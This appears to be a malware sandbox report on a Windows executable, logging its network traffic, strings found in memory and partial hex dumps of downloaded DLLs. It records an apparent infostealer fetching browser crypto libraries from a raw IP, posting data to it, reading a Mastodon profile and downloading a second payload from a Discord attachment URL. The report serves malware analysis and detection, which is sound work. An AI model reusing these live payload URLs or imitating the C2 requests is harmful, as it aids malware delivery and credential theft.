Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 16 Oct 2021 14:53:25 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Sun, 17 Oct 2021 14:53:25 GMTCache-Control: max-age=86400X-Cache-Status: HITX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 16 Oct 2021 14:53:26 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Sun, 17 Oct 2021 14:53:26 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 16 Oct 2021 14:53:27 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Sun, 17 Oct 2021 14:53:27 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: unknown

HTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.7:49755 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190

Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/10089
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/1008I
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/freebl3.dll
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/freebl3.dlln/c
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/mozglue.dll
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/msvcp140.dll
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/msvcp140.dllK
Source: MSQNZmmg2F.exe, 00000000.00000002.329522492.0000000001ADC000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/nss3.dll
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/nss3.dll&
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/softokn3.dll
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/softokn3.dlle
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: http://65.108.80.190/vcruntime140.dll
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: MSQNZmmg2F.exe, 00000000.00000002.330406958.000000000433F000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe
Source: MSQNZmmg2F.exe, 00000000.00000002.330406958.000000000433F000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe;
Source: MSQNZmmg2F.exe, 00000000.00000002.329522492.0000000001ADC000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe;M
Source: MSQNZmmg2F.exe, 00000000.00000002.330406958.000000000433F000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe;ilesu
Source: MSQNZmmg2F.exe, 00000000.00000002.330406958.000000000433F000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exeilesf
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue[1].dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: softokn3[1].dll.0.dr	String found in binary or memory: http://www.mozilla.com0
Source: MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp, temp0.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSQNZmmg2F.exe, 00000000.00000002.329933702.00000000040B0000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: MSQNZmmg2F.exe, 00000000.00000002.329522492.0000000001ADC000.00000004.00000001.sdmp, MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe
Source: MSQNZmmg2F.exe, 00000000.00000002.329522492.0000000001ADC000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe-M5
Source: MSQNZmmg2F.exe, 00000000.00000002.329522492.0000000001ADC000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exekL
Source: MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp, temp0.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp, temp0.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp, temp0.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp, temp0.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSQNZmmg2F.exe, 00000000.00000003.252555492.0000000001AF1000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/tootsuite/mastodon
Source: MSQNZmmg2F.exe, 00000000.00000003.252555492.0000000001AF1000.00000004.00000001.sdmp	String found in binary or memory: https://joinmastodon.org/apps
Source: MSQNZmmg2F.exe, 00000000.00000002.329478018.0000000001A95000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to/
Source: MSQNZmmg2F.exe, 00000000.00000003.252555492.0000000001AF1000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to/avatars/original/missing.png
Source: MSQNZmmg2F.exe, 00000000.00000003.252555492.0000000001AF1000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to/users/oleg98/followers
Source: MSQNZmmg2F.exe, 00000000.00000003.252555492.0000000001AF1000.00000004.00000001.sdmp	String found in binary or memory: https://mas.to/users/oleg98/following
Source: MSQNZmmg2F.exe, 00000000.00000003.252555492.0000000001AF1000.00000004.00000001.sdmp	String found in binary or memory: https://media.mas.to/masto-public/site_uploads/files/000/000/003/original/elephant_ui_plane-e3f2d57c
Source: temp0.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: temp0.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: softokn3[1].dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: MSQNZmmg2F.exe, 00000000.00000003.315333875.000000000411E000.00000004.00000001.sdmp, temp0.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST /1008 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 65.108.80.190Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--

Source: unknown

DNS traffic detected: queries for: mas.to

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe

Code function: 0_2_00415DD0 InternetSetFilePointer,InternetReadFile,_memmove,_memset,HttpQueryInfoA,_memcpy_s,_memcpy_s,

0_2_00415DD0

Source: global traffic	HTTP traffic detected: GET /@oleg98 HTTP/1.1Host: mas.to
Source: global traffic	HTTP traffic detected: GET /attachments/898638713985302540/898905970657345626/al.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Connection: Keep-AliveHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/898638713985302540/898905970657345626/al.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: cdn.discordapp.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.7:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.7:49752 version: TLS 1.2

Source: MSQNZmmg2F.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_0041F1C0	0_2_0041F1C0
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_00499FB0	0_2_00499FB0
Source: C:\Users\user\Desktop\MSQNZmmg2F.exe	Code function: 0_2_004B38EF	0_2_004B38EF
